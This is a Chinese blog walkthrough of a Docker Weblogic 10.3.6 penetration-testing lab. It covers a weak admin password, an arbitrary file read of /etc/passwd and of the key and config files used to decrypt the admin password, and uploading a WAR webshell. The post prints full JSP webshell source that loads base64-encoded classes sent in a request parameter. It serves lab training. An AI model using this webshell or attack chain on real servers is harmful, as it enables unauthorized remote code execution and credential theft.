首页 > 其他分享 >Weblogic 常规渗透测试环境

Weblogic 常规渗透测试环境

时间:2023-12-01 14:15:12浏览次数:35  
标签:文件 读取 渗透 weblogic 10.10 Weblogic 上传 war 测试环境

Weblogic 常规渗透测试环境

本环境模拟了一个真实的weblogic环境,其后台存在一个弱口令,并且前台存在任意文件读取漏洞。分别通过这两种漏洞,模拟对weblogic场景的渗透。
weblogic版本:10.3.6(11g)
Java版本:1.6
启动本环境:

cd weblogic/weak_password
docker-compose up -d

弱口令

环境启动后,访问http://10.10.10.10:7001/console,即为weblogic后台。
本环境存在弱口令:

  • weblogic
  • Oracle@123

任意文件读取漏洞的利用

假设不存在弱口令,如何对weblogic进行渗透?

本环境前台模拟了一个任意文件下载漏洞,访问http://10.10.10.10:7001/hello/file.jsp?path=/etc/passwd可见成功读取passwd文件。那么,该漏洞如何利用?

读取后台用户密文与秘钥文件

weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.datconfig.xml,在本环境中为./security/SerializedSystemIni.dat和./config/config.xml(基于当前目录/root/Oracle/Middleware/user_projects/domains/base_domain)。

SerializedSystemIni.dat是一个二进制文件,所以一定要用burpsuite来读取,用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码,右键copy to file就可以保存成一个文件:
img

config.xml是base_domain的全局配置文件,所以乱七八糟的内容比较多,找到其中的的值,即为加密后的管理员密码,不要找错了:
img
识别密码
img
如果识别不了,设置burp字符集
img

后台上传webshell

获取到管理员密码后,登录后台。点击左侧的部署,可见一个应用列表:
img
点击安装,选择"上传文件":
img
上传war包。值得注意的是,我们平时tomcat用的war包不一定能够成功,你可以将你的webshell放到本项目的web/hello.war这个压缩包中,再上传。上传成功后点击下一步。
先将webshell压缩成zip压缩包,修改后缀名为war:

<!-- webshell -->
<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
 
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getParameter("passwd");
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext);
    }
%>

img
然后访问http://10.10.10.10:7001/muma/muma.jsp
使用蚁剑连接,连接密码为:passwd

img

标签:文件,读取,渗透,weblogic,10.10,Weblogic,上传,war,测试环境
From: https://www.cnblogs.com/kalixcn/p/17869541.html

相关文章

  • 测试环境使用问题及其优化对策实践
    1背景及问题G.J.Myers在<软件测试技巧>中提出:测试是为了寻找错误而运行程序的过程,一个好的测试用例是指很可能找到迄今为止尚未发现的错误的测试,一个成功的测试是揭示了迄今为止尚未发现的错误的测试。对于新手来说,日常测试用例设计时,很少用到系统的方法论,大多是根据产品需求......
  • 智安网络|发现未知风险,探索渗透测试的奥秘与技巧
    在当今信息时代,网络安全已成为组织和个人面临的重大挑战。为了保护网络系统的安全,渗透测试成为一种重要的手段。一、渗透测试的基本原理渗透测试是通过模拟黑客攻击的方式,对目标系统进行安全评估。其基本原理是模拟真实攻击者的思维和行为方式,以发现目标系统中的安全漏洞和弱点。渗......
  • 渗透测试工具
    序号工具名称用途下载链接1Xray1.XSS漏洞检测(key:xss)2.SQL注入检测(key:sqldet)3.命令/代码注入检测(key:cmd-injection)4.目录枚举(key:dirscan)5.路径穿越检测(key:path-traversal)6.XML实体注入检测(key:xxe)7.文件上传检测(key:uploa......
  • 【渗透工具】红蓝对抗重点OA系统漏洞利用工具新年贺岁版 发布!
    免责声明本公众号的技术文章与工具仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责......
  • 使用Rkhunter检测linux渗透
    目前可以发现大多数已知的rootkits和一些嗅探器以及后门程序。它通过执行一系列的测试脚本来确认服务器是否已经感染rootkits,比如检查rootkits使用的基本文件,可执行二进制文件的错误文件权限,检测内核模块等等。使用yum或者apt直接安装rkhunter--checkall可以使用unhide查看......
  • 安全防护之渗透测试
    针对企业安全体系,以合宜价格并多元化黑客进犯方法及思想尝试侵略该企业的网站和信息体系的渗透测验服务,意图是找出各种潜在的缝隙,验证企业的数据是否可被盗取或损坏,评价信息体系的安全性是否有需求加强。产品优势:1、多元化进犯方法:针对不同缝隙供给多元进犯方法2、项目支撑全面:一......
  • 通过访问URL地址,5分钟内渗透你的网站!很刑很可拷!
    今天我来带大家简单渗透一个小破站,通过这个案例,让你深入了解为什么很多公司都需要紧急修复各个中间件的漏洞以及进行URL解析拦截等重要操作。这些措施的目的是为了保护网站和系统的安全性。如果不及时升级和修复漏洞,你就等着被黑客攻击吧!基础科普首先,我想说明一下,我提供的信息仅......
  • Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)
    Weblogic<10.3.6'wls-wsat'XMLDecoder反序列化漏洞(CVE-2017-10271)Weblogic的WLSSecurity组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。环境搭建cdweblogic/CVE-2017-10271docker-compose......
  • 网络渗透测试:wireshark抓取qq图片
    打开wireshark,打开qq因为连的是WiFi,所以这里选择WLAN  用手机给电脑发送jpg文件,随后开始抓取,我们给电脑发送的是jpg文件,所以筛选十六进制值为ffd8ff  鼠标右键,选择追踪流,tcp,选择原始数据 将其保存,然后放到winhex里,查找ffd8,将前面的数据删去,然后保存为jpg文件。......
  • 【渗透测试】工具实践之AWVS
    AWVS安装及使⽤使⽤docker安装dockerpullxrsec/awvs启动镜像https://hub.docker.com/r/xrsec/awvs参考链接下载破解脚本,在本地执⾏登录⽤户名密码发起扫描转到“添加⽬标”⻚⾯以配置要扫描的新⽹站:dockerrun-it-d\--nameawvs\-p3443:3443\xrsec/awvs:latestwgethttps......